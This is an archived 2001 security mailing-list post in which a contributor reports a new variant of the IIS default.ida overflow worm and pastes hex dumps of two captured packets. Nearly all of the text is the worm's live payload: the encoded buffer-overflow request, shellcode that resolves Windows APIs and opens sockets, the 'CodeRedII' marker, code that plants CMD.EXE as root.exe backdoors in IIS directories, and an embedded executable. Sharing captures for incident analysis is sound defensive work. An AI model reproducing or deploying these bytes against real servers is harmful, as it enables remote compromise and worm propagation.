Hi folks, since 2001-08-04 13:13:07 GMT +0200 the usual CodeScans are every now and then interrupted by a modified version. The first thing to notice is that the fillup chars are changed from N to X. Overflow code seems to be the same but the rest of the packet has changed. The snort alerts show first the usual ida attempt and then directly following an alert for CMD.EXE. First packet dump (ida alert): length = 1460 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. 1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... 210 : C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 220 : 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 230 : 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24 ...CodeRedII...$ 240 : FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P 250 : FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 260 : 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 270 : 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. 280 : FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 290 : 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 2a0 : 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 2b0 : 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U 2c0 : D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 2d0 : 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 2e0 : 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 2f0 : 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 300 : 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 310 : 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. 320 : FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 330 : 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 340 : 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. 350 : FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P 360 : FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 370 : DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. 380 : FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 390 : 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. 3a0 : FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. 3b0 : FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 3c0 : 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 3d0 : 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 3e0 : 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 3f0 : 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 400 : 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. 410 : C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... 420 : F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 430 : 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 440 : 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 450 : 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 460 : 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u 470 : BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 480 : 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 490 : 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4a0 : 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 4b0 : 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 4c0 : 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 4d0 : 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 4e0 : 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 4f0 : 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 500 : 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. 510 : E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U 520 : F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 530 : 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. 540 : FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 550 : 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 560 : 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 570 : 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 580 : 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 590 : 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E 5a0 : D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 5b0 : 74 6F 6D 41 tomA Second alert (cmd.exe alert): length = 1460 000 : 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 010 : 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U 020 : F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 030 : 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 040 : 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. 050 : E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. 060 : FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 070 : 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 080 : 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 090 : 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 0a0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 0b0 : 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u 0c0 : BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 0d0 : 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E 0e0 : A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u 0f0 : BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 100 : 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 110 : 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 120 : 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 130 : 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 140 : 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 150 : 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 160 : 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 170 : 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. 180 : FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 190 : 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 1a0 : 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 1b0 : 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 1c0 : 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... 1d0 : C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. 1e0 : C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ 1f0 : E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ 200 : E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... 210 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ 220 : FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 230 : 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X....... 240 : 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 250 : 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. 260 : BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 270 : 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 280 : 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 290 : 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 2a0 : 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2b0 : 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 2c0 : 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 2d0 : 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 2e0 : 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 2f0 : 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... 300 : FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 310 : 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 320 : 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 330 : 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 340 : 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 350 : 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 360 : 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 370 : 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 380 : 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 390 : 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 3a0 : 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 3c0 : 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 3e0 : 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 3f0 : 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 410 : 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 420 : 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... 430 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 440 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 450 : FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h 470 : D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 480 : 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 490 : 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 4a0 : 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 4b0 : 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 4c0 : 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 4d0 : 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 4e0 : 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 4f0 : 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... 500 : E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 510 : 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h 520 : B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. 530 : 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 540 : 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 550 : 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 560 : 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 570 : 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 580 : 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. 590 : C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 5a0 : 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 5b0 : 40 00 89 35 @..5 CU Sven ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sat Aug 04 2001 - 19:46:05 PDT